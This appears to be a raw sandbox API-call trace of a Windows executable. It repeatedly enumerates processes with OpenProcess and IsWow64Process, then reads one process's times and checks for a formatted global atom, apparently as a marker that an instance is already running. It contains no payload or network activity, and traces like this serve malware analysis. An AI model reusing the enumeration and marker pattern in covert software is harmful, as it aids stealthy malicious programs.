	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.959] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.960] CloseHandle (hObject=0x224) returned 1
	[0078.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.960] CloseHandle (hObject=0x224) returned 1
	[0078.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.960] CloseHandle (hObject=0x224) returned 1
	[0078.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.960] CloseHandle (hObject=0x224) returned 1
	[0078.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.961] CloseHandle (hObject=0x224) returned 1
	[0078.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.961] CloseHandle (hObject=0x224) returned 1
	[0078.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.961] CloseHandle (hObject=0x224) returned 1
	[0078.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.961] CloseHandle (hObject=0x224) returned 1
	[0078.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.962] CloseHandle (hObject=0x224) returned 1
	[0078.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.962] CloseHandle (hObject=0x224) returned 1
	[0078.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.962] CloseHandle (hObject=0x224) returned 1
	[0078.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.962] CloseHandle (hObject=0x224) returned 1
	[0078.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.963] CloseHandle (hObject=0x224) returned 1
	[0078.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.963] CloseHandle (hObject=0x224) returned 1
	[0078.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.963] CloseHandle (hObject=0x224) returned 1
	[0078.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.963] CloseHandle (hObject=0x224) returned 1
	[0078.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.963] CloseHandle (hObject=0x224) returned 1
	[0078.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.963] CloseHandle (hObject=0x224) returned 1
	[0078.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.964] CloseHandle (hObject=0x224) returned 1
	[0078.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.964] CloseHandle (hObject=0x224) returned 1
	[0078.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.964] CloseHandle (hObject=0x224) returned 1
	[0078.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.964] CloseHandle (hObject=0x224) returned 1
	[0078.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.964] CloseHandle (hObject=0x224) returned 1
	[0078.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.965] CloseHandle (hObject=0x224) returned 1
	[0078.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.965] CloseHandle (hObject=0x224) returned 1
	[0078.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.965] CloseHandle (hObject=0x224) returned 1
	[0078.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.965] CloseHandle (hObject=0x224) returned 1
	[0078.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.965] CloseHandle (hObject=0x224) returned 1
	[0078.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.965] CloseHandle (hObject=0x224) returned 1
	[0078.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.966] CloseHandle (hObject=0x224) returned 1
	[0078.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.966] CloseHandle (hObject=0x224) returned 1
	[0078.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.966] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.966] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.966] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.966] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.967] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.967] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.967] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.967] CloseHandle (hObject=0x224) returned 1
	[0078.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.967] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.967] CloseHandle (hObject=0x224) returned 1
	[0078.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.968] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.968] CloseHandle (hObject=0x224) returned 1
	[0079.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.045] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.045] CloseHandle (hObject=0x224) returned 1
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.045] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.045] CloseHandle (hObject=0x224) returned 1
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.045] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.045] CloseHandle (hObject=0x224) returned 1
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.046] CloseHandle (hObject=0x224) returned 1
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.046] CloseHandle (hObject=0x224) returned 1
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.046] CloseHandle (hObject=0x224) returned 1
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.046] CloseHandle (hObject=0x224) returned 1
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.046] CloseHandle (hObject=0x224) returned 1
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.046] CloseHandle (hObject=0x224) returned 1
	[0079.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.047] CloseHandle (hObject=0x224) returned 1
	[0079.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.047] CloseHandle (hObject=0x224) returned 1
	[0079.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.047] CloseHandle (hObject=0x224) returned 1
	[0079.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.047] CloseHandle (hObject=0x224) returned 1
	[0079.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.047] CloseHandle (hObject=0x224) returned 1
	[0079.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.047] CloseHandle (hObject=0x224) returned 1
	[0079.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.048] CloseHandle (hObject=0x224) returned 1
	[0079.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.048] CloseHandle (hObject=0x224) returned 1
	[0079.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.048] CloseHandle (hObject=0x224) returned 1
	[0079.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.048] CloseHandle (hObject=0x224) returned 1
	[0079.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.048] CloseHandle (hObject=0x224) returned 1
	[0079.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.048] CloseHandle (hObject=0x224) returned 1
	[0079.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.048] CloseHandle (hObject=0x224) returned 1
	[0079.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.049] CloseHandle (hObject=0x224) returned 1
	[0079.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.049] CloseHandle (hObject=0x224) returned 1
	[0079.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.049] CloseHandle (hObject=0x224) returned 1
	[0079.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.049] CloseHandle (hObject=0x224) returned 1
	[0079.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.049] CloseHandle (hObject=0x224) returned 1
	[0079.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.049] CloseHandle (hObject=0x224) returned 1
	[0079.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.050] CloseHandle (hObject=0x224) returned 1
	[0079.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.050] CloseHandle (hObject=0x224) returned 1
	[0079.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.050] CloseHandle (hObject=0x224) returned 1
	[0079.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.050] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.050] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.050] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.051] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.051] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.051] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.051] CloseHandle (hObject=0x224) returned 1
	[0079.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0079.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.051] CloseHandle (hObject=0x224) returned 1
	[0079.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.051] CloseHandle (hObject=0x224) returned 1
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.121] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.121] CloseHandle (hObject=0x224) returned 1
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
